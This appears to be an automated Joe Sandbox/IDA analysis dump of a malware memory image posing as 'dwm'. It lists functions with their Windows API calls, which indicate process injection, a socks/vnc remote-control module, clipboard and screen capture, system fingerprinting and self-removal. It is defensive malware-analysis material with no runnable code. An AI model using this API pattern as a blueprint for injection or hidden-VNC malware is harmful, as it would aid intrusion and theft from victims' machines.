Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064D325, Relevance: 9.1, APIs: 6, Instructions: 78

APIs

Part of subcall function 00642828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 006428A1

PathRemoveFileSpecW.SHLWAPI(?), ref: 0064D34A
PathRemoveFileSpecW.SHLWAPI(?), ref: 0064D35D

Part of subcall function 0064C86B: SetEvent.KERNEL32(0064D36D,00000000), ref: 0064C871
Part of subcall function 0064C86B: WaitForSingleObject.KERNEL32(00000158,000000FF), ref: 0064C884

Part of subcall function 0063BCAF: SHDeleteValueW.SHLWAPI(80000001,?,?), ref: 0063BCEC
Part of subcall function 0063BCAF: Sleep.KERNEL32(000001F4), ref: 0063BCFB
Part of subcall function 0063BCAF: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 0063BD11

Part of subcall function 00648A29: FindFirstFileW.KERNEL32(?,?,?,?), ref: 00648A5A
Part of subcall function 00648A29: FindNextFileW.KERNEL32(00000000,?), ref: 00648AB5
Part of subcall function 00648A29: FindClose.KERNEL32(00000000), ref: 00648AC0
Part of subcall function 00648A29: SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 00648ACC
Part of subcall function 00648A29: RemoveDirectoryW.KERNEL32(?), ref: 00648AD3

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 0064D39B
CharToOemW.USER32(?,?), ref: 0064D3B7
CharToOemW.USER32(?,?), ref: 0064D3C6

Part of subcall function 006440F2: wvnsprintfA.SHLWAPI(?,0000026C,?,?), ref: 0064410D

ExitProcess.KERNEL32(00000000), ref: 0064D41C

Part of subcall function 00644E7B: CharToOemW.USER32(?,?), ref: 00644EAB
Part of subcall function 00644E7B: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00644F2F

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00647AF0, Relevance: 9.1, APIs: 6, Instructions: 72

APIs

WindowFromPoint.USER32(?,?), ref: 00647B0C
SendMessageTimeoutW.USER32(00000000,00000084,00000000,?,00000002,?,?), ref: 00647B3D
GetWindowLongW.USER32(00000000,000000F0), ref: 00647B61
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00647B72
GetWindowLongW.USER32(?,000000F0), ref: 00647B8F
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00647B9D

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006485D0, Relevance: 9.1, APIs: 6, Instructions: 68

APIs

CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 006485F5
GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00642D27,?,?,00000000), ref: 00648608
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,00642D27,?,?,00000000), ref: 00648630
ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00648648
VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00642D27,?,?,00000000), ref: 00648662
CloseHandle.KERNEL32(?), ref: 0064866B

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00635A94, Relevance: 9.1, APIs: 6, Instructions: 54

APIs

GetUpdateRgn.USER32(?,?,?), ref: 00635B1C

Part of subcall function 0064262D: WaitForSingleObject.KERNEL32(00000000,0063BB83), ref: 00642635

TlsGetValue.KERNEL32 ref: 00635AB4
SetRectRgn.GDI32(?,?,?,?,?), ref: 00635AD4
SaveDC.GDI32(?), ref: 00635AE4
SendMessageW.USER32(?,00000014,?,00000000), ref: 00635AF4
RestoreDC.GDI32(?,00000000), ref: 00635B06

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00644660, Relevance: 9.1, APIs: 6, Instructions: 53

APIs

CryptAcquireContextW.ADVAPI32(00648C87,00000000,00000000,00000001,F0000040,00000000,00648C87,?,00000030,?,?,?,006491A0,?), ref: 00644679
CryptCreateHash.ADVAPI32(00008003,00008003,00000000,00000000,?,?,?,006491A0,?), ref: 00644691
CryptHashData.ADVAPI32(?,00000010), ref: 006446AD
CryptGetHashParam.ADVAPI32(?,00000002,?,00000010,00000000), ref: 006446C5
CryptDestroyHash.ADVAPI32(?), ref: 006446DC
CryptReleaseContext.ADVAPI32(?,00000000,?,?,006491A0,?), ref: 006446E6

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00636010, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 189

APIs

GetTickCount.KERNEL32(0000271B,00020000,00000000,00002719,00020000,00000000,00000000,000000FF,00000000), ref: 0063610F
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 006361E6

Part of subcall function 006370A6: GetVersionExW.KERNEL32(?,?,00000000,00000006), ref: 006370CA
Part of subcall function 006370A6: GetNativeSystemInfo.KERNEL32(?), ref: 006370D8

GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,000000FF,00000000), ref: 00636162
GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,000000FF,00000000), ref: 006361A4

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Part of subcall function 006434BD: GetSystemTime.KERNEL32(?,?,?,006360C8,00000000,000000FF,00000000), ref: 006434C7
Part of subcall function 006434BD: SystemTimeToFileTime.KERNEL32(?,000000FF,?,?,006360C8,00000000,000000FF,00000000), ref: 006434D5

Part of subcall function 006434E5: GetTimeZoneInformation.KERNEL32(?), ref: 006434F4

Strings

, xrefs: 00636218

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00637125, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64

APIs

ConvertSidToStringSidW.ADVAPI32(?,?), ref: 00637138

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

LocalFree.KERNEL32(?,.exe,00000000), ref: 006371C0

Part of subcall function 006474DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00637194,?,?,00000104,.exe,00000000), ref: 006474F4
Part of subcall function 006474DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00637194,?,?,00000104), ref: 00647575

PathUnquoteSpacesW.SHLWAPI(?), ref: 006371A0
ExpandEnvironmentStringsW.KERNEL32(?,0064D23A,00000104), ref: 006371AD

Strings

.exe, xrefs: 00637147

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00644F8F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46

APIs

InternetOpenA.WININET(?,?,00000000,00000000,00000000), ref: 00644FA6
InternetSetOptionA.WININET(00000000,00000002,0065200C,00000004), ref: 00644FC5
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00644FE2
InternetCloseHandle.WININET(00000000), ref: 00644FEE

Strings

Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1), xrefs: 00644F97, 00644FA5

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00635ECF, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45

APIs

PathRemoveFileSpecW.SHLWAPI(C:\Users\admin\AppData\Roaming\Yfheor), ref: 00635F07
PathRenameExtensionW.SHLWAPI(00000000,.tmp), ref: 00635F23

Part of subcall function 006489C2: PathSkipRootW.SHLWAPI(?), ref: 006489CD
Part of subcall function 006489C2: GetFileAttributesW.KERNEL32(?,?,00000000,0064D261,?,?,?,?,?), ref: 006489F5
Part of subcall function 006489C2: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0064D261,?,?,?,?,?), ref: 00648A03

Part of subcall function 00646A3C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;CIOI;NRNWNX;;;LW),00000001,00000000,00000000), ref: 00646A5B
Part of subcall function 00646A3C: GetSecurityDescriptorSacl.ADVAPI32(00000000,?,?,00000000), ref: 00646A77
Part of subcall function 00646A3C: SetNamedSecurityInfoW.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,?), ref: 00646A8E
Part of subcall function 00646A3C: LocalFree.KERNEL32(00000000), ref: 00646A9D

GetFileAttributesW.KERNEL32(006523C8,C:\Users\admin\AppData\Roaming\Yfheor,C:\Users\admin\AppData\Roaming\Yfheor,00000000,00020000,006369C9,00000001,?,8793AEF2,00000002,00002723,00020000,00000000,00002722,00020000,?), ref: 00635F46

Part of subcall function 00642828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 006428A1

Strings

.tmp, xrefs: 00635F1D
C:\Users\admin\AppData\Roaming\Yfheor, xrefs: 00635EDE, 00635EF7, 00635EFF, 00635F39, 00635F3F

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00645403, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44

APIs

LoadLibraryA.KERNEL32(urlmon.dll), ref: 00645414
GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00645427
FreeLibrary.KERNEL32(?), ref: 00645479

Strings

urlmon.dll, xrefs: 0064540D
ObtainUserAgentString, xrefs: 00645421

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063748F, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 207

APIs

lstrcmpiA.KERNEL32(?,socks,?,00000000,00000104), ref: 006374BE
lstrcmpiA.KERNEL32(?,vnc), ref: 006374D1

Part of subcall function 00647425: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00647444
Part of subcall function 00647425: CloseHandle.KERNEL32(?), ref: 00647450

Part of subcall function 00647477: SetLastError.KERNEL32(0000009B,00642AC8,00000000,0063BB5F,00000000,00652AF0,00000000,00000104,76C605D7,00000000), ref: 00647481
Part of subcall function 00647477: CreateThread.KERNEL32(00000000,00652AF0,00652AF0,00652AF0,00000000,00000000), ref: 006474A4

Part of subcall function 0064675E: shutdown.WS2_32(?,00000002), ref: 00646766
Part of subcall function 0064675E: #3.WS2_32(?), ref: 0064676D

Part of subcall function 006474BC: WaitForMultipleObjects.KERNEL32(?,00652AEC,00000001,000000FF), ref: 006474CE

CloseHandle.KERNEL32(?), ref: 006376EE

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Part of subcall function 00646B8E: ReleaseMutex.KERNEL32(00000000,00643021,?,?,?), ref: 00646B92

Part of subcall function 00646444: getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 00646463
Part of subcall function 00646444: freeaddrinfo.WS2_32(?,?,?,?,?,00637284,?), ref: 006464B0

Part of subcall function 006467B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 006467CC

Part of subcall function 00646774: WSAIoctl.WS2_32(?,98000004,?,0000000C,00000000,00000000,?,00000000,00000000), ref: 006467A7

Part of subcall function 0064666B: select.WS2_32(00000000,?,00000000,00000000,00000001), ref: 006466EA
Part of subcall function 0064666B: WSASetLastError.WS2_32(0000274C), ref: 006466F9

Part of subcall function 0064636E: recv.WS2_32(?,?,00000001,00000000), ref: 00646392

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

Strings

socks, xrefs: 006374B7
vnc, xrefs: 006374CA

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00639D55, Relevance: 7.7, APIs: 5, Instructions: 202

APIs

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008), ref: 00639E0C
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00639E37
RegOpenKeyExW.ADVAPI32(?,?,00000000,00000001,?,?,?,000000FF,?,?,000000FF,?,?,000000FF), ref: 00639ED7

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

Part of subcall function 00647607: RegQueryValueExW.KERNEL32(?,?,00000000,?,00649E26,?,?,?,006475CD,?,?,00000000,00000004,?), ref: 0064761F
Part of subcall function 00647607: RegCloseKey.KERNEL32(?,?,006475CD,?,?,00000000,00000004,?,?,?,?,00649E26,?,?), ref: 0064762D

RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 00639F7A
RegCloseKey.ADVAPI32(?), ref: 00639F8D

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Part of subcall function 006474DF: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,00637194,?,?,00000104,.exe,00000000), ref: 006474F4
Part of subcall function 006474DF: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,00637194,?,?,00000104), ref: 00647575

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00638E1B, Relevance: 7.7, APIs: 5, Instructions: 158

APIs

Part of subcall function 00648C40: PathCombineW.SHLWAPI(00641F45,00641F45,?), ref: 00648C5F

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00638E82
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,000000FF,000000FF,?), ref: 00638F16
GetPrivateProfileIntW.KERNEL32(00000015,?,00000015,?), ref: 00638F34
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,?,000000FF,?), ref: 00638F5F
GetPrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000,000000FF,?), ref: 00638F7B

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00649224, Relevance: 7.6, APIs: 5, Instructions: 111

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000001,00000000,00000004,00000080,00000000), ref: 00649245

Part of subcall function 006486EF: GetFileSizeEx.KERNEL32(0064925C,0064925C,?,?,?,0064925C,00000000), ref: 006486FB

ReadFile.KERNEL32(?,?,00000005,00000000,00000000), ref: 00649286
CloseHandle.KERNEL32(?), ref: 00649292
ReadFile.KERNEL32(?,?,00000005,00000005,00000000), ref: 00649301
SetEndOfFile.KERNEL32(?,?,?,?,00000000), ref: 00649327

Part of subcall function 0064869F: SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 006486B1

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00649959, Relevance: 7.6, APIs: 5, Instructions: 99

APIs

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

GetDIBits.GDI32(00000000,0063DE4B,00000000,00000001,00000000,00000000,00000000), ref: 00649991
GetDIBits.GDI32(00000000,0063DE4B,00000000,00000001,00000000,00000000,00000000), ref: 006499A7
DeleteObject.GDI32(0063DE4B), ref: 006499B4
CreateDIBSection.GDI32(00000000,00000000,00000000,00652888,?,?), ref: 00649A24

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

DeleteObject.GDI32(0063DE4B), ref: 00649A43

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064B3EC, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 00648C40: PathCombineW.SHLWAPI(00641F45,00641F45,?), ref: 00648C5F

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 0064B437
WriteFile.KERNEL32(0064B3D4,?,00000146,?,00000000), ref: 0064B475
WriteFile.KERNEL32(0064B3D4,?,00000000,?,00000000), ref: 0064B499
FlushFileBuffers.KERNEL32(0064B3D4), ref: 0064B4AD
CloseHandle.KERNEL32(0064B3D4), ref: 0064B4B6

Part of subcall function 00648716: SetFileAttributesW.KERNEL32(00000080,00000080,0064B4CD,?), ref: 0064871F
Part of subcall function 00648716: DeleteFileW.KERNEL32(?), ref: 00648729

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064C49B, Relevance: 7.6, APIs: 5, Instructions: 85

APIs

Part of subcall function 0064262D: WaitForSingleObject.KERNEL32(00000000,0063BB83), ref: 00642635

GetProcessId.KERNEL32(?), ref: 0064C509

Part of subcall function 0064245B: CreateMutexW.KERNEL32(00652C30,00000001,?,00652E70,76C605D7,?,00000002,?,76C605D7), ref: 006424A3
Part of subcall function 0064245B: GetLastError.KERNEL32 ref: 006424AF
Part of subcall function 0064245B: CloseHandle.KERNEL32(00000000), ref: 006424BD

Part of subcall function 00642542: DuplicateHandle.KERNEL32(000000FF,?,00000000,?,00000000,00000000,00000002), ref: 00642574
Part of subcall function 00642542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0064316D,?,00000000,?,?,00000000), ref: 006425AB
Part of subcall function 00642542: WriteProcessMemory.KERNEL32(00000000,?,?,00000004,00000000,?,?,?,?,0064316D,?,00000000,?,?,00000000), ref: 006425CB
Part of subcall function 00642542: VirtualFreeEx.KERNEL32(00000000,?,00000000,00008000,00000000,?,00000000,?,?,?,?,0064316D,?,00000000), ref: 0064261A

GetThreadContext.KERNEL32 ref: 0064C557
SetThreadContext.KERNEL32(00000000,00000000), ref: 0064C596
VirtualFreeEx.KERNEL32(?,00000000,00000000,00008000), ref: 0064C5AD
CloseHandle.KERNEL32(?), ref: 0064C5B7

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00635DFB, Relevance: 7.6, APIs: 5, Instructions: 80

APIs

GetWindowInfo.USER32(?,?), ref: 00635E1A
IntersectRect.USER32(?,?), ref: 00635E58
IsRectEmpty.USER32(?), ref: 00635E6A
IntersectRect.USER32(?,?), ref: 00635E81

Part of subcall function 00635C8A: GetWindowThreadProcessId.USER32(?,?), ref: 00635CB4
Part of subcall function 00635C8A: ResetEvent.KERNEL32(00000010), ref: 00635D03
Part of subcall function 00635C8A: PostMessageW.USER32(?,?,?,00000010), ref: 00635D26
Part of subcall function 00635C8A: WaitForSingleObject.KERNEL32(00000010,00000064), ref: 00635D35
Part of subcall function 00635C8A: ResetEvent.KERNEL32(?,?,?,00000010), ref: 00635D60
Part of subcall function 00635C8A: PostThreadMessageW.USER32(?,?,000000FC,?), ref: 00635D70
Part of subcall function 00635C8A: WaitForSingleObject.KERNEL32(?,000003E8), ref: 00635D82
Part of subcall function 00635C8A: TerminateProcess.KERNEL32(?,00000000,?,00000010), ref: 00635DA7
Part of subcall function 00635C8A: IntersectRect.USER32(?,?), ref: 00635DC7
Part of subcall function 00635C8A: FillRect.USER32(?,?,00000006), ref: 00635DD9
Part of subcall function 00635C8A: DrawEdge.USER32(?,?,0000000A,0000000F), ref: 00635DED

GetTopWindow.USER32(?), ref: 00635EB1

Part of subcall function 00647AC1: GetWindow.USER32(?,00000001), ref: 00647AE3

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064B062, Relevance: 7.6, APIs: 5, Instructions: 70

APIs

GetClipboardData.USER32(?), ref: 0064B06B

Part of subcall function 0064262D: WaitForSingleObject.KERNEL32(00000000,0063BB83), ref: 00642635

GlobalLock.KERNEL32(00000000), ref: 0064B09F
EnterCriticalSection.KERNEL32(00653FB4,00000000,00000000), ref: 0064B0DF

Part of subcall function 0064AD5F: EnterCriticalSection.KERNEL32(00653FB4,?,?,?,0064B052,?), ref: 0064AD7C
Part of subcall function 0064AD5F: LeaveCriticalSection.KERNEL32(00653FB4,?,?,?,0064B052,?), ref: 0064AD9D
Part of subcall function 0064AD5F: EnterCriticalSection.KERNEL32(00653FB4,?,?,?,?,0064B052,?), ref: 0064ADAE
Part of subcall function 0064AD5F: LeaveCriticalSection.KERNEL32(00653FB4,?,?,?,0064B052,?), ref: 0064AE47

LeaveCriticalSection.KERNEL32(00653FB4,00000000,00634A68), ref: 0064B0F6

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

GlobalUnlock.KERNEL32(?), ref: 0064B109

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 006468E0, Relevance: 7.6, APIs: 5, Instructions: 63

APIs

socket.WS2_32(000000FF,00000002,00000000), ref: 006468F2
WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00020000,00000000,00020000,00000000,00000000), ref: 0064691C
WSAGetLastError.WS2_32 ref: 00646923

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

WSAIoctl.WS2_32(00000000,48000016,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0064694F

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

#3.WS2_32(?), ref: 00646963

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00648A29, Relevance: 7.6, APIs: 5, Instructions: 61

APIs

Part of subcall function 00648C40: PathCombineW.SHLWAPI(00641F45,00641F45,?), ref: 00648C5F

FindFirstFileW.KERNEL32(?,?,?,?), ref: 00648A5A

Part of subcall function 00648716: SetFileAttributesW.KERNEL32(00000080,00000080,0064B4CD,?), ref: 0064871F
Part of subcall function 00648716: DeleteFileW.KERNEL32(?), ref: 00648729

FindNextFileW.KERNEL32(00000000,?), ref: 00648AB5
FindClose.KERNEL32(00000000), ref: 00648AC0
SetFileAttributesW.KERNEL32(?,00000080,?,?), ref: 00648ACC
RemoveDirectoryW.KERNEL32(?), ref: 00648AD3

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00635A01, Relevance: 7.6, APIs: 5, Instructions: 56

APIs

GetUpdateRect.USER32(?,?,?), ref: 00635A88

Part of subcall function 0064262D: WaitForSingleObject.KERNEL32(00000000,0063BB83), ref: 00642635

TlsGetValue.KERNEL32 ref: 00635A21
SaveDC.GDI32(?), ref: 00635A51
SendMessageW.USER32(?,00000014,?,00000000), ref: 00635A61
RestoreDC.GDI32(?,00000000), ref: 00635A73

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00635BF6, Relevance: 7.5, APIs: 5, Instructions: 48

APIs

GetCurrentThread.KERNEL32(00000001,?,?,?,?,?,?,?,?,006430F6), ref: 00635C03
SetThreadPriority.KERNEL32(00000000,?,?,?,?,?,?,?,?,006430F6), ref: 00635C0A
SetEvent.KERNEL32(?,?,?,?,?,?,?,?,006430F6), ref: 00635C1C

Part of subcall function 006354A9: GetWindowInfo.USER32(?,?), ref: 00635515
Part of subcall function 006354A9: IntersectRect.USER32(?,?,-00000114), ref: 00635538
Part of subcall function 006354A9: IntersectRect.USER32(?,?,-00000114), ref: 0063558E
Part of subcall function 006354A9: GetDC.USER32(00000000), ref: 006355D2
Part of subcall function 006354A9: CreateCompatibleDC.GDI32(00000000), ref: 006355E3
Part of subcall function 006354A9: ReleaseDC.USER32(00000000,00000000), ref: 006355ED
Part of subcall function 006354A9: SelectObject.GDI32(00000000,?), ref: 00635602
Part of subcall function 006354A9: DeleteDC.GDI32(00000000), ref: 00635610
Part of subcall function 006354A9: TlsSetValue.KERNEL32(?), ref: 0063565B
Part of subcall function 006354A9: EqualRect.USER32(?,?), ref: 00635675
Part of subcall function 006354A9: SaveDC.GDI32(00000000), ref: 00635680
Part of subcall function 006354A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 0063569B
Part of subcall function 006354A9: SendMessageW.USER32(?,00000085,00000001,00000000), ref: 006356BB
Part of subcall function 006354A9: DefWindowProcW.USER32(?,00000317,00000000,00000002), ref: 006356CD
Part of subcall function 006354A9: RestoreDC.GDI32(00000000,?), ref: 006356E4
Part of subcall function 006354A9: SaveDC.GDI32(00000000), ref: 00635706
Part of subcall function 006354A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0063571C
Part of subcall function 006354A9: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 00635735
Part of subcall function 006354A9: RestoreDC.GDI32(00000000,?), ref: 00635743
Part of subcall function 006354A9: SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00635756
Part of subcall function 006354A9: SendMessageW.USER32(?,0000000F,00000000,00000000), ref: 00635766
Part of subcall function 006354A9: DefWindowProcW.USER32(?,00000317,00000000,00000004), ref: 00635778
Part of subcall function 006354A9: TlsSetValue.KERNEL32(00000000), ref: 00635792
Part of subcall function 006354A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 006357B2
Part of subcall function 006354A9: DefWindowProcW.USER32(00000004,00000317,00000000,0000000E), ref: 006357CE
Part of subcall function 006354A9: SelectObject.GDI32(00000000,?), ref: 006357E4
Part of subcall function 006354A9: DeleteDC.GDI32(00000000), ref: 006357EB
Part of subcall function 006354A9: SetViewportOrgEx.GDI32(00000000,000000FC,?,00000000), ref: 00635813
Part of subcall function 006354A9: PrintWindow.USER32(00000008,00000000,00000000), ref: 00635829

SetEvent.KERNEL32(00652868,?,00000001), ref: 00635C69
GetMessageW.USER32(?,000000FF,00000000,00000000), ref: 00635C76

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063B0AD, Relevance: 7.5, APIs: 5, Instructions: 32

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0063B0B3
ReleaseMutex.KERNEL32(?), ref: 0063B0E7
IsWindow.USER32(?), ref: 0063B0EE
PostMessageW.USER32(?,00000215,00000000,?), ref: 0063B108
SendMessageW.USER32(?,00000215,00000000,?), ref: 0063B110

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064040D, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 217

APIs

Part of subcall function 00646973: getsockname.WS2_32(?,?,?), ref: 00646991

Part of subcall function 0064636E: recv.WS2_32(?,?,00000001,00000000), ref: 00646392

getaddrinfo.WS2_32(?,00000000,00000000,?), ref: 006404DC
freeaddrinfo.WS2_32(?,?,?,00000004), ref: 00640515

Part of subcall function 006464FD: socket.WS2_32(00000000,00000001,00000006), ref: 00646506
